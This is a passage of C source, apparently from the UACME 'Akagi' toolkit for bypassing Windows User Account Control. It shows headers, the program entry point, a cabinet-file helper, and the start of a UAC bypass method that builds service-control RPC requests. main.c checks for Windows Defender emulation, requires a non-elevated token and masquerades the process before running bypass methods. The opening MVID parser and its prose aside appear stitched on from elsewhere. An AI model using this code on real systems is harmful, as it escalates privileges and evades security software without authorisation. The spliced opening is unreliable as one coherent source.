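/* Walk the stream headers following the STORAGEHEADER at hdr_off; return 1 and
 * the offset/size of the stream called `name`, 0 if it is absent or malformed. */
static int cli_find_stream(const uint8_t *md, size_t len, size_t hdr_off,
                           const char *name, uint32_t *off, uint32_t *size)
{
    size_t pos = hdr_off + 4, n;
    uint16_t i, nstreams;

    if (hdr_off + 4 > len) return 0;
    nstreams = rd16(md + hdr_off + 2);               /* STORAGEHEADER.iStreams */
    for (i = 0; i < nstreams; i++) {
        if (pos + 8 >= len) return 0;
        /* rcName: NUL-terminated, under MAXSTREAMNAME bytes, inside the buffer */
        n = 0;
        while (pos + 8 + n < len && n < CLI_MAXSTREAMNAME && md[pos + 8 + n]) n++;
        if (pos + 8 + n >= len || n == CLI_MAXSTREAMNAME) return 0;
        if (strcmp((const char *)md + pos + 8, name) == 0) {
            *off = rd32(md + pos);
            *size = rd32(md + pos + 4);
            return *off <= len && *size <= len - *off;  /* stream lies inside blob */
        }
        pos += (8 + n + 1 + 3) & ~(size_t)3;          /* entries are 4-byte aligned */
    }
    return 0;
}

/* Copy the Module table's MVID into mvid[16]. Returns 1 on success, 0 otherwise. */
int cli_get_mvid(const uint8_t *md, size_t len, uint8_t mvid[16])
{
    uint32_t tab_off, tab_size, guid_off, guid_size, verlen, idx, i, ntables = 0;
    uint64_t valid;
    size_t row;

    if (len < 16 || rd32(md) != CLI_MAGIC) return 0;
    verlen = rd32(md + 12);                          /* STORAGESIGNATURE.iVersionString */
    if (verlen > len - 16) return 0;
    if (!cli_find_stream(md, len, 16 + verlen, "#~", &tab_off, &tab_size)) return 0;
    if (!cli_find_stream(md, len, 16 + verlen, "#GUID", &guid_off, &guid_size)) return 0;
    if (tab_size < 24) return 0;                     /* STORAGETABLESHEADER up to Rows[] */
    valid = rd64(md + tab_off + 8);
    if ((valid & 1) == 0) return 0;                  /* Module table (0x00) must be present */
    for (i = 0; i < 64; i++) ntables += (uint32_t)((valid >> i) & 1);
    if ((uint64_t)4 * ntables > tab_size - 24 || rd32(md + tab_off + 24) == 0) return 0;
    /* Module row: Generation (2) | Name (2 or 4) | Mvid (2 or 4) | EncId | EncBaseId */
    row = (size_t)tab_off + 24 + (size_t)4 * ntables + 2;
    row += (md[tab_off + 6] & CLI_STRINGS_BIT) ? 4 : 2;
    if (md[tab_off + 6] & CLI_GUIDS_BIT) {
        if (row + 4 > len) return 0;
        idx = rd32(md + row);
    } else {
        if (row + 2 > len) return 0;
        idx = rd16(md + row);
    }
    if (idx == 0 || (uint64_t)idx * 16 > guid_size) return 0;  /* 1-based heap index */
    memcpy(mvid, md + guid_off + (size_t)(idx - 1) * 16, 16);
    return 1;
}

/* Constructed sample input: a minimal 116-byte metadata root with one Module row
 * whose MVID is `want`. Returns bytes written, 0 if `cap` is too small. */
size_t cli_build_sample(uint8_t *out, size_t cap, const uint8_t want[16])
{
    static const uint8_t root[60] = {
        0x42,0x53,0x4A,0x42, 1,0, 1,0, 0,0,0,0, 12,0,0,0,   /* BSJB, v1.1, 12-byte version */
        'v','4','.','0','.','3','0','3','1','9',0,0,
        0,0, 2,0,                                            /* STORAGEHEADER: 2 streams */
        60,0,0,0, 40,0,0,0, '#','~',0,0,                     /* #~    at 60, 40 bytes    */
        100,0,0,0, 16,0,0,0, '#','G','U','I','D',0,0,0 };    /* #GUID at 100, 16 bytes   */
    static const uint8_t tables[40] = {
        0,0,0,0, 2,0,0,1,                /* Reserved0, v2.0, HeapOffsetSizes 0, Reserved1 */
        1,0,0,0,0,0,0,0,                 /* Valid: only the Module table */
        0,0,0,0,0,0,0,0,                 /* Sorted */
        1,0,0,0,                         /* Rows[0] = 1 */
        0,0, 1,0, 1,0, 0,0, 0,0, 0,0 };  /* Module row: Mvid index 1, then padding */
    if (cap < 116) return 0;
    memcpy(out, root, 60);
    memcpy(out + 60, tables, 40);
    memcpy(out + 100, want, 16);
    return 116;
}

/* Round trip: build, parse back, and confirm that a copy truncated before the
 * #GUID heap is rejected instead of being read past its end. */
int cli_example_roundtrip(void)
{
    static const uint8_t want[16] = { 0xDE,0xAD,0xBE,0xEF, 1,2,3,4, 5,6,7,8, 9,10,11,12 };
    uint8_t buf[128], got[16];
    size_t n = cli_build_sample(buf, sizeof buf, want);
    if (n != 116 || !cli_get_mvid(buf, n, got) || memcmp(got, want, 16) != 0) return 0;
    return cli_get_mvid(buf, 95, got) == 0;
}
```

The table-count loop shifts the full 64-bit Valid mask, which is the portable form of the LowPart/HighPart split used in fusUtilGetImageMVID; the 1-based GUID index is checked against the #GUID stream size before the copy, the check a mapped-image parser needs just as much as a buffer parser.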
// typedef HRESULT(WINAPI* pfnCreateAssemblyEnum)( _Out_ IAssemblyEnum** pEnum, _In_opt_ IUnknown* pUnkReserved, _In_opt_ IAssemblyName* pName, _In_ DWORD dwFlags, _Reserved_ LPVOID pvReserved); typedef HRESULT(WINAPI* pfnCreateAssemblyCache)( _Out_ IAssemblyCache** ppAsmCache, _In_ DWORD dwReserved); typedef struct _FUSION_SCAN_PARAM { _In_ GUID* ReferenceMVID; _Out_ LPWSTR lpFileName; } FUSION_SCAN_PARAM, * PFUSION_SCAN_PARAM; typedef BOOL(CALLBACK* pfnFusionScanFilesCallback)( LPWSTR CurrentDirectory, WIN32_FIND_DATA* FindData, PVOID UserContext); typedef struct _UACME_FUSION_CONTEXT { BOOL Initialized; HINSTANCE hFusion; pfnCreateAssemblyCache CreateAssemblyCache; pfnCreateAssemblyEnum CreateAssemblyEnum; } UACME_FUSION_CONTEXT, * PUACME_FUSION_CONTEXT; BOOLEAN fusUtilInitFusion( _In_ DWORD dwVersion); VOID fusUtilBinToUnicodeHex( _In_ const BYTE* pSrc, _In_ UINT cSrc, _Out_cap_(2 * cSrc + 1) LPWSTR pDst); HRESULT fusUtilGetAssemblyName( _In_ IAssemblyName* pInterface, _Inout_ LPWSTR* lpName, _Out_opt_ PSIZE_T pcchName, _Inout_opt_ LPWSTR* lpDisplayName, _Out_opt_ PSIZE_T pcchDisplayName); BOOL fusUtilGetAssemblyMVIDFromZapCache( _In_ LPCWSTR AssemblyName, _Inout_ GUID* ModuleVersionId); HRESULT fusUtilGetAssemblyPath( _In_ IAssemblyCache* pInterface, _In_ LPCWSTR lpAssemblyName, _Inout_ LPCWSTR* lpAssemblyPath); BOOLEAN fusUtilGetAssemblyPathByName( _In_ LPWSTR lpAssemblyName, _Inout_ LPWSTR* lpAssemblyPath); BOOL fusUtilReferenceStreamByName( _In_ STORAGEHEADER* StorageHeader, _In_ LPCSTR StreamName, _Out_ PSTORAGESTREAM* StreamRef); BOOL fusUtilGetImageMVID( _In_ LPCWSTR lpImageName, _Out_ GUID* ModuleVersionId); BOOL fusUtilFindFileByMVIDCallback( _In_ LPWSTR CurrentDirectory, _In_ WIN32_FIND_DATA* FindData, _In_ PVOID UserContext); BOOL fusUtilScanDirectory( _In_ LPWSTR lpDirectory, _In_ LPWSTR lpExtension, _In_ pfnFusionScanFilesCallback pfnCallback, _In_opt_ PVOID pvUserContext); VOID fusUtilCombineNativeImageCacheName( _In_ LPCWSTR lpAssemblyName, 
_Inout_ LPWSTR lpNativeImageName, _In_ DWORD cchNativeName, _In_ BOOLEAN fIsAux); ================================================ FILE: Source/Akagi/global.h ================================================ /******************************************************************************* * * (C) COPYRIGHT AUTHORS, 2014 - 2023 * * TITLE: GLOBAL.H * * VERSION: 3.65 * * DATE: 22 Sep 2023 * * Common header file for the program support routines. * * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A * PARTICULAR PURPOSE. * *******************************************************************************/ #pragma once #if !defined UNICODE #error ANSI build is not supported #endif #include "shared\libinc.h" //disable nonmeaningful warnings. #pragma warning(disable: 4005) // macro redefinition #pragma warning(disable: 4055) // %s : from data pointer %s to function pointer %s #pragma warning(disable: 4152) // nonstandard extension, function/data pointer conversion in expression #pragma warning(disable: 4201) // nonstandard extension used : nameless struct/union #pragma warning(disable: 6102) // Using %s from failed function call at line %u #pragma warning(disable: 6258) // Using TerminateThread does not allow proper thread clean up #pragma warning(disable: 6320) // exception-filter expression is the constant EXCEPTION_EXECUTE_HANDLER #pragma warning(disable: 6255 6263) // alloca #pragma warning(disable: 28159) #define PAYLOAD_ID_NONE MAXDWORD #define SECRETS_ID IDR_SECRETS #ifdef _WIN64 #include "bin64res.h" #define FUBUKI_ID IDR_FUBUKI64 #define AKATSUKI_ID IDR_AKATSUKI64 #define FUBUKI32_ID IDR_FUBUKI32 #define FUBUKI64_ID IDR_FUBUKI64 #define KAMIKAZE_ID IDR_KAMIKAZE #else #include "bin32res.h" #define FUBUKI_ID IDR_FUBUKI32 #define AKATSUKI_ID PAYLOAD_ID_NONE //this module unavailable for 32 bit #define FUBUKI32_ID 
IDR_FUBUKI32 #define KAMIKAZE_ID IDR_KAMIKAZE #endif #include #include #include #include #include #include #include #define SECURITY_WIN32 #include #pragma comment(lib, "taskschd.lib") #pragma comment(lib, "rpcrt4.lib") #pragma comment (lib, "Secur32.lib") #pragma warning(push) #pragma warning(disable: 4115) //named type definition in parentheses #include #pragma warning(pop) #include "shared\hde\hde64.h" #include "shared\ntos\ntos.h" #include "shared\ntos\ntbuilds.h" #include "shared\minirtl.h" #include "shared\cmdline.h" #include "shared\_filename.h" #include "shared\ldr.h" #include "shared\windefend.h" #include "shared\consts.h" #include "sup.h" #include "fusutil.h" #include "compress.h" #include "aic.h" #include "stub.h" #include "console.h" #include "methods\methods.h" //default execution flow #define AKAGI_FLAG_KILO 1 //suppress all additional output #define AKAGI_FLAG_TANGO 2 typedef struct _UACME_SHARED_CONTEXT { HANDLE hIsolatedNamespace; HANDLE hSharedSection; HANDLE hCompletionEvent; } UACME_SHARED_CONTEXT, *PUACME_SHARED_CONTEXT; typedef struct _UACME_CONTEXT { BOOLEAN IsWow64; ULONG Cookie; ULONG dwBuildNumber; ULONG AkagiFlag; ULONG IFileOperationFlags; // Count of characters ULONG OptionalParameterLength; PVOID ucmHeap; pfnDecompressPayload DecompressRoutine; pswprintf_s swprintf_s; UACME_FUSION_CONTEXT FusionContext; UACME_SHARED_CONTEXT SharedContext; // Windows directory with end slash WCHAR szSystemRoot[MAX_PATH + 1]; // Windows\System32 directory with end slash WCHAR szSystemDirectory[MAX_PATH + 1]; // Current user temp directory with end slash WCHAR szTempDirectory[MAX_PATH + 1]; // Current program directory with end slash WCHAR szCurrentDirectory[MAX_PATH + 1]; // Optional parameter, limited to MAX_PATH WCHAR szOptionalParameter[MAX_PATH + 1]; // Default payload (system32\cmd.exe), limited to MAX_PATH WCHAR szDefaultPayload[MAX_PATH + 1]; } UACMECONTEXT, *PUACMECONTEXT; typedef struct _UACME_PARAM_BLOCK { ULONG Crc32; ULONG SessionId; ULONG 
    AkagiFlag;
    WCHAR szParameter[MAX_PATH + 1];
    WCHAR szDesktop[MAX_PATH + 1];
    WCHAR szWinstation[MAX_PATH + 1];
    WCHAR szSignalObject[MAX_PATH + 1];
} UACME_PARAM_BLOCK, *PUACME_PARAM_BLOCK;

typedef UINT(WINAPI *pfnEntryPoint)(
    _In_ UCM_METHOD Method,
    _In_reads_or_z_opt_(OptionalParameterLength) LPWSTR OptionalParameter,
    _In_ ULONG OptionalParameterLength
    );

typedef struct _UACME_THREAD_CONTEXT {
    TEB_ACTIVE_FRAME Frame;
    pfnEntryPoint ucmMain;
    DWORD ReturnedResult;
    ULONG OptionalParameterLength;
    LPWSTR OptionalParameter;
} UACME_THREAD_CONTEXT, *PUACME_THREAD_CONTEXT;

extern PUACMECONTEXT g_ctx;
extern HINSTANCE g_hInstance;

================================================
FILE: Source/Akagi/main.c
================================================
/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2014 - 2022
*
*  TITLE:       MAIN.C
*
*  VERSION:     3.61
*
*  DATE:        22 Jun 2022
*
*  Program entry point.
*
*  THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
*  ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
*  TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
*  PARTICULAR PURPOSE.
*
*******************************************************************************/

#define OEMRESOURCE
#include "global.h"

#pragma comment(lib, "comctl32.lib")

//Runtime context global variable
PUACMECONTEXT g_ctx;

//Image Base Address global variable
HINSTANCE g_hInstance;

/*
* ucmInit
*
* Purpose:
*
* Prestart phase with MSE / Windows Defender anti-emulation part.
*
* Note:
*
* supHeapAlloc unavailable during this routine and calls from it.
*
*/
NTSTATUS ucmInit(
    _Inout_ UCM_METHOD *RunMethod,
    _In_reads_or_z_opt_(OptionalParameterLength) LPWSTR OptionalParameter,
    _In_ ULONG OptionalParameterLength
)
{
    UCM_METHOD Method;
    LPWSTR optionalParameter = NULL;
    ULONG optionalParameterLength = 0;
#ifndef _DEBUG
    TOKEN_ELEVATION_TYPE ElevType;
#endif
    ULONG bytesIO;
    WCHAR szBuffer[MAX_PATH + 1];

    wdCheckEmulatedVFS();
    ucmConsoleInit();

    bytesIO = 0;
    RtlQueryElevationFlags(&bytesIO);
    if ((bytesIO & DBG_FLAG_ELEVATION_ENABLED) == 0)
        return STATUS_ELEVATION_REQUIRED;

    if (FAILED(CoInitializeEx(NULL, COINIT_APARTMENTTHREADED)))
        return STATUS_INTERNAL_ERROR;

    InitCommonControls();

    if (g_hInstance == NULL)
        g_hInstance = (HINSTANCE)NtCurrentPeb()->ImageBaseAddress;

    if (*RunMethod == UacMethodInvalid) {
        bytesIO = 0;
        RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
        GetCommandLineParam(GetCommandLine(), 1, szBuffer, MAX_PATH, &bytesIO);
        if (bytesIO == 0) {
            return STATUS_INVALID_PARAMETER;
        }
        Method = (UCM_METHOD)_strtoul(szBuffer);
        *RunMethod = Method;
    }
    else {
        Method = *RunMethod;
    }

#ifndef _DEBUG
    if (Method == UacMethodTest)
        return STATUS_INVALID_PARAMETER;
#endif

    if (Method >= UacMethodMax)
        return STATUS_INVALID_PARAMETER;

#ifndef _DEBUG
    ElevType = TokenElevationTypeDefault;
    if (supGetElevationType(&ElevType)) {
        if (ElevType != TokenElevationTypeLimited) {
            return STATUS_NOT_SUPPORTED;
        }
    }
    else {
        return STATUS_INTERNAL_ERROR;
    }
#endif

    //
    // Process optional parameter.
    //
    if ((OptionalParameter == NULL) || (OptionalParameterLength == 0)) {
        RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer));
        bytesIO = 0;
        GetCommandLineParam(GetCommandLine(), 2, szBuffer, MAX_PATH, &bytesIO);
        if (bytesIO > 0) {
            optionalParameter = (LPWSTR)&szBuffer;
            optionalParameterLength = bytesIO;
        }
    }
    else {
        optionalParameter = OptionalParameter;
        optionalParameterLength = OptionalParameterLength;
    }

    g_ctx = (PUACMECONTEXT)supCreateUacmeContext(Method,
        optionalParameter,
        optionalParameterLength,
        supEncodePointer(DecompressPayload));

    if (g_ctx == NULL)
        return STATUS_FATAL_APP_EXIT;

    return STATUS_SUCCESS;
}

/*
* ucmMain
*
* Purpose:
*
* Program entry point.
*
*/
NTSTATUS WINAPI ucmMain(
    _In_ UCM_METHOD Method,
    _In_reads_or_z_opt_(OptionalParameterLength) LPWSTR OptionalParameter,
    _In_ ULONG OptionalParameterLength
)
{
    NTSTATUS Status;
    UCM_METHOD method = Method;

    Status = ucmInit(&method, OptionalParameter, OptionalParameterLength);
    ucmConsolePrintStatus(TEXT("[*] ucmInit"), Status);

    if (!NT_SUCCESS(Status))
        return Status;

    supMasqueradeProcess(FALSE);

    return MethodsManagerCall(method);
}

/*
* main
*
* Purpose:
*
* Program entry point.
*
*/
#pragma comment(linker, "/ENTRY:main")
VOID __cdecl main()
{
#ifdef _UCM_CONSOLE
    ULONG result;

    result = StubInit(ucmMain);
    ucmConsolePrintValueUlong(TEXT("[+] ucmMain"), result, TRUE);
    ucmConsoleRelease();
    ExitProcess(result);
#else
    ExitProcess(StubInit(ucmMain));
#endif
}

================================================
FILE: Source/Akagi/makecab.c
================================================
/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2015 - 2020
*
*  TITLE:       MAKECAB.C
*
*  VERSION:     3.24
*
*  DATE:        20 Apr 2020
*
*  Simplified Cabinet file support for makecab utility replacement.
*
*  THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
*  ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
*  TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
*  PARTICULAR PURPOSE.
*
*******************************************************************************/

#include "global.h"
#include "makecab.h"

#pragma comment(lib, "cabinet.lib")

/*
** CAB Callbacks START
*/

LPVOID DIAMONDAPI fnFCIALLOC(
    ULONG cb
)
{
    return supHeapAlloc((SIZE_T)cb);
}

VOID DIAMONDAPI fnFCIFREE(
    VOID HUGE *lpMem
)
{
    if (lpMem)
        supHeapFree((PVOID)lpMem);
}

INT_PTR DIAMONDAPI fnFCIOPEN(
    LPSTR pszFile,
    int oflag,
    int pmode,
    int FAR *err,
    void FAR *pv
)
{
    HANDLE hFile = NULL;
    DWORD dwDesiredAccess = 0;
    DWORD dwCreationDisposition = 0;

    UNREFERENCED_PARAMETER(pv);
    UNREFERENCED_PARAMETER(pmode);

    // Map the CRT-style open flags FCI passes in onto Win32 access/disposition.
    if (oflag & _O_RDWR) {
        dwDesiredAccess = GENERIC_READ | GENERIC_WRITE;
    }
    else if (oflag & _O_WRONLY) {
        dwDesiredAccess = GENERIC_WRITE;
    }
    else {
        dwDesiredAccess = GENERIC_READ;
    }

    if (oflag & _O_CREAT) {
        dwCreationDisposition = CREATE_ALWAYS;
    }
    else {
        dwCreationDisposition = OPEN_EXISTING;
    }

    hFile = CreateFileA(pszFile,
        dwDesiredAccess,
        FILE_SHARE_READ,
        NULL,
        dwCreationDisposition,
        FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        if (err) {
            *err = GetLastError();
        }
    }

    return (INT_PTR)hFile;
}

UINT DIAMONDAPI fnFCIREAD(
    INT_PTR hf,
    void FAR *memory,
    UINT cb,
    int FAR *err,
    void FAR *pv
)
{
    DWORD dwBytesRead = 0;

    UNREFERENCED_PARAMETER(pv);

    if (ReadFile((HANDLE)hf, memory, cb, &dwBytesRead, NULL) == FALSE) {
        dwBytesRead = (DWORD)-1;
        if (err) {
            *err = GetLastError();
        }
    }

    return dwBytesRead;
}

UINT DIAMONDAPI fnFCIWRITE(
    INT_PTR hf,
    void FAR *memory,
    UINT cb,
    int FAR *err,
    void FAR *pv
)
{
    DWORD dwBytesWritten = 0;

    UNREFERENCED_PARAMETER(pv);

    if (WriteFile((HANDLE)hf, memory, cb, &dwBytesWritten, NULL) == FALSE) {
        dwBytesWritten = (DWORD)-1;
        if (err) {
            *err = GetLastError();
        }
    }

    return dwBytesWritten;
}

int DIAMONDAPI fnFCICLOSE(
    INT_PTR hf,
    int FAR *err,
    void FAR *pv
)
{
    INT iResult = 0;

    UNREFERENCED_PARAMETER(pv);

    if (CloseHandle((HANDLE)hf) == FALSE) {
        if (err) {
            *err = GetLastError();
        }
        iResult = -1;
    }

    return iResult;
}

long DIAMONDAPI fnFCISEEK(
    INT_PTR hf,
    long dist,
    int seektype,
    int FAR *err,
    void FAR *pv
)
{
    INT iResult = 0;
    // LARGE_INTEGER mdist, ndist;

    UNREFERENCED_PARAMETER(pv);

    /*
    sdist.LowPart = dist;
    mdist.HighPart = 0;
    ndist.LowPart = 0;
    ndist.HighPart = 0;
    if (!SetFilePointerEx((HANDLE)hf, mdist, &ndist, seektype)) {
        if (err) *err = GetLastError();
    }
    return ndist.LowPart;
    */

    iResult = SetFilePointer((HANDLE)hf, dist, NULL, seektype); //-V303
    if (iResult == -1) {
        if (err) {
            *err = GetLastError();
        }
    }

    return iResult;
}

int DIAMONDAPI fnFCIDELETE(
    LPSTR pszFile,
    int FAR *err,
    void FAR *pv
)
{
    INT iResult = 0;

    UNREFERENCED_PARAMETER(pv);

    if (DeleteFileA(pszFile) == FALSE) {
        if (err) {
            *err = GetLastError();
        }
        iResult = -1;
    }

    return iResult;
}

long DIAMONDAPI fnFCISTATUS(
    UINT typeStatus,
    ULONG cb1,
    ULONG cb2,
    void FAR *pv
)
{
    UNREFERENCED_PARAMETER(typeStatus);
    UNREFERENCED_PARAMETER(cb1);
    UNREFERENCED_PARAMETER(cb2);
    UNREFERENCED_PARAMETER(pv);

    return 0; //not implemented
}

int DIAMONDAPI fnFCIFILEPLACED(
    PCCAB pccab,
    LPSTR pszFile,
    long cbFile,
    BOOL fContinuation,
    void FAR *pv
)
{
    UNREFERENCED_PARAMETER(pccab);
    UNREFERENCED_PARAMETER(pszFile);
    UNREFERENCED_PARAMETER(cbFile);
    UNREFERENCED_PARAMETER(fContinuation);
    UNREFERENCED_PARAMETER(pv);

    return 0; //not implemented
}

INT_PTR DIAMONDAPI fnFCIGETOPENINFO(
    LPSTR pszName,
    USHORT *pdate,
    USHORT *ptime,
    USHORT *pattribs,
    int FAR *err,
    void FAR *pv
)
{
    HANDLE hFile;
    FILETIME fileTime;
    BY_HANDLE_FILE_INFORMATION fileInfo;

    hFile = (HANDLE)fnFCIOPEN(pszName, _O_RDONLY, 0, err, pv);
    if (hFile != INVALID_HANDLE_VALUE) {
        if (GetFileInformationByHandle(hFile, &fileInfo) &&
            FileTimeToLocalFileTime(&fileInfo.ftCreationTime, &fileTime) &&
            FileTimeToDosDateTime(&fileTime, pdate, ptime))
        {
            // Only the attribute bits a cabinet entry can carry are kept.
            *pattribs = (USHORT)fileInfo.dwFileAttributes;
            *pattribs &= (FILE_ATTRIBUTE_READONLY |
                FILE_ATTRIBUTE_HIDDEN |
                FILE_ATTRIBUTE_SYSTEM |
                FILE_ATTRIBUTE_ARCHIVE);
        }
        else {
            fnFCICLOSE((INT_PTR)hFile, err, pv);
            hFile = INVALID_HANDLE_VALUE;
        }
    }

    return (INT_PTR)hFile;
}

BOOL DIAMONDAPI fnFCIGETTEMPFILE(
    char *pszTempName,
    int cbTempName,
    void FAR *pv
)
{
    BOOL bSucceeded = FALSE;
    SIZE_T cch;
    CHAR szTempPath[MAX_PATH];
    CHAR szTempFile[MAX_PATH];

    UNREFERENCED_PARAMETER(pv);

    RtlSecureZeroMemory(szTempPath, sizeof(szTempPath));
    RtlSecureZeroMemory(szTempFile, sizeof(szTempFile));

    if (GetTempPathA(MAX_PATH, szTempPath) != 0) {
        if (GetTempFileNameA(szTempPath, "ucm", 0, szTempFile) != 0) {
            // GetTempFileNameA creates the file; FCI only wants a free name.
            DeleteFileA(szTempFile);
            cch = (SIZE_T)(cbTempName / sizeof(CHAR));
            _strncpy_a(pszTempName, cch, szTempFile, _strlen_a(szTempFile));
            bSucceeded = TRUE;
        }
    }

    return bSucceeded;
}

BOOL DIAMONDAPI fnFCIGETNEXTCABINET(
    PCCAB pccab,
    ULONG cbPrevCab,
    void FAR *pv
)
{
    UNREFERENCED_PARAMETER(pccab);
    UNREFERENCED_PARAMETER(cbPrevCab);
    UNREFERENCED_PARAMETER(pv);

    return FALSE;
}

/*
** CAB Callbacks END
*/

/*
* cabCreate
*
* Purpose:
*
* Initialize cabinet class object.
*
*/
CABDATA *cabCreate(
    _In_ LPWSTR lpszCabName
)
{
    PCABDATA pCabinet;
    CHAR szCab[CB_MAX_CABINET_NAME];

    if (lpszCabName == NULL) {
        return NULL;
    }

    RtlSecureZeroMemory(szCab, sizeof(szCab));

    if (WideCharToMultiByte(CP_ACP, 0, lpszCabName, -1, szCab, CB_MAX_CABINET_NAME - 2, 0, NULL) == 0) {
        return NULL;
    }

    pCabinet = (PCABDATA)supHeapAlloc(sizeof(CABDATA));
    if (pCabinet == NULL)
        return NULL;

    _strcpy_a(pCabinet->cab.szCab, szCab); //Full name with path or only name (current folder then).
    pCabinet->cab.cb = 0x7FFFFFFF; //Maximum cabinet size in bytes.

    pCabinet->hfci = FCICreate(
        &pCabinet->erf,
        fnFCIFILEPLACED,
        fnFCIALLOC,
        fnFCIFREE,
        fnFCIOPEN,
        fnFCIREAD,
        fnFCIWRITE,
        fnFCICLOSE,
        fnFCISEEK,
        fnFCIDELETE,
        fnFCIGETTEMPFILE,
        &pCabinet->cab,
        NULL);

    if (pCabinet->hfci == NULL) {
        supHeapFree(pCabinet);
        pCabinet = NULL;
    }

    return pCabinet;
}

/*
* cabAddFile
*
* Purpose:
*
* Insert given file to the previously initialized cabinet object.
*
*/
BOOL cabAddFile(
    _In_ CABDATA *Cabinet,
    _In_ LPWSTR lpszFileName,
    _In_ LPWSTR lpszInternalName
)
{
    BOOL bResult = FALSE;
    CHAR szFileName[CB_MAX_FILENAME];
    CHAR szInternalName[CB_MAX_FILENAME];

    do {

        if (Cabinet == NULL) {
            break;
        }

        //convert filename to ansi
        RtlSecureZeroMemory(szFileName, sizeof(szFileName));
        if (WideCharToMultiByte(CP_ACP, 0, lpszFileName, -1, szFileName, CB_MAX_FILENAME - 2, 0, NULL) == 0) {
            break;
        }

        //convert internal name to ansi
        RtlSecureZeroMemory(szInternalName, sizeof(szInternalName));
        if (WideCharToMultiByte(CP_ACP, 0, lpszInternalName, -1, szInternalName, CB_MAX_FILENAME - 2, 0, NULL) == 0) {
            break;
        }

        bResult = FCIAddFile(Cabinet->hfci,
            (char*)szFileName,
            (char*)szInternalName,
            FALSE,
            fnFCIGETNEXTCABINET,
            fnFCISTATUS,
            fnFCIGETOPENINFO,
            tcompTYPE_NONE /*tcompTYPE_MSZIP*/);

    } while (FALSE);

    return bResult;
}

/*
* cabClose
*
* Purpose:
*
* Flush file and destroy cabinet class.
*
*/
VOID cabClose(
    _In_ CABDATA *Cabinet
)
{
    if (Cabinet == NULL) {
        return;
    }

    FCIFlushCabinet(
        Cabinet->hfci,
        FALSE,
        fnFCIGETNEXTCABINET,
        fnFCISTATUS
    );

    FCIDestroy(Cabinet->hfci);
    supHeapFree(Cabinet);
}

================================================
FILE: Source/Akagi/makecab.h
================================================
/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2015 - 2017
*
*  TITLE:       MAKECAB.H
*
*  VERSION:     2.70
*
*  DATE:        25 Mar 2017
*
*  Prototypes and definitions for makecab module.
*
*  THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
*  ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
*  TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
*  PARTICULAR PURPOSE.
*
*******************************************************************************/

#pragma once

#include <fci.h>    // ERF, CCAB, HFCI, FCICreate/FCIAddFile/FCIFlushCabinet/FCIDestroy
#include <fcntl.h>  // _O_RDWR, _O_WRONLY, _O_CREAT, _O_RDONLY used by the FCI open callback

typedef struct _CABDATA {
    ERF erf;
    CCAB cab;
    HFCI hfci;
} CABDATA, *PCABDATA;

CABDATA *cabCreate(
    _In_ LPWSTR lpszCabName);

BOOL cabAddFile(
    _In_ CABDATA *Cabinet,
    _In_ LPWSTR lpszFileName,
    _In_ LPWSTR lpszInternalName);

VOID cabClose(
    _In_ CABDATA *Cabinet);

================================================
FILE: Source/Akagi/methods/antonioCoco.c
================================================
/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2023 - 2025
*
*  TITLE:       ANTONIOCOCO.C
*
*  VERSION:     3.69
*
*  DATE:        07 Jul 2025
*
*  UAC bypass method from antonioCoco.
*
*  https://github.com/antonioCoco/SspiUacBypass
*
*  THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
*  ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
*  TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
*  PARTICULAR PURPOSE.
*
*******************************************************************************/

#include "global.h"

#define MAX_MESSAGE_SIZE 12000

// rpc command ids
#define RPC_CMD_ID_OPEN_SC_MANAGERW 15
#define RPC_CMD_ID_CREATE_SERVICEW  12
#define RPC_CMD_ID_START_SERVICEW   19
#define RPC_CMD_ID_DELETE_SERVICE   2

// rpc command output lengths
#define RPC_OUTPUT_LENGTH_OPEN_SC_MANAGER 24
#define RPC_OUTPUT_LENGTH_CREATE_SERVICE  28
#define RPC_OUTPUT_LENGTH_START_SERVICE   4
#define RPC_OUTPUT_LENGTH_DELETE_SERVICE  4

#define MAX_RPC_PACKET_LENGTH     4096
#define MAX_PROCEDURE_DATA_LENGTH 2048

// Number of padding bytes needed to bring VALUE_LENGTH up to the next ALIGN_BYTES boundary (NDR 4-byte alignment).
#define CALC_ALIGN_PADDING(VALUE_LENGTH, ALIGN_BYTES) (((((VALUE_LENGTH) + (ALIGN_BYTES) - 1) / (ALIGN_BYTES)) * (ALIGN_BYTES)) - (VALUE_LENGTH))

// {8a885d04-1ceb-11c9-9fe8-08002b104860} (NDR)
#define RPC_NDR_UUID (RPC_WSTR)L"8a885d04-1ceb-11c9-9fe8-08002b104860"
#define SVCCTL_UUID  (RPC_WSTR)L"367abb81-9844-35f1-ad32-98f038001003"

// Common 16-byte header of every connection-oriented DCE/RPC PDU.
typedef struct _RPC_BASE_HEADER {
    WORD wVersion;
    BYTE bPacketType;
    BYTE bPacketFlags;
    DWORD dwDataRepresentation;
    WORD wFragLength;
    WORD wAuthLength;
    DWORD dwCallIndex;
} RPC_BASE_HEADER, *PRPC_BASE_HEADER;

typedef struct _RPC_REQUEST_HEADER {
    DWORD dwAllocHint;
    WORD wContextID;
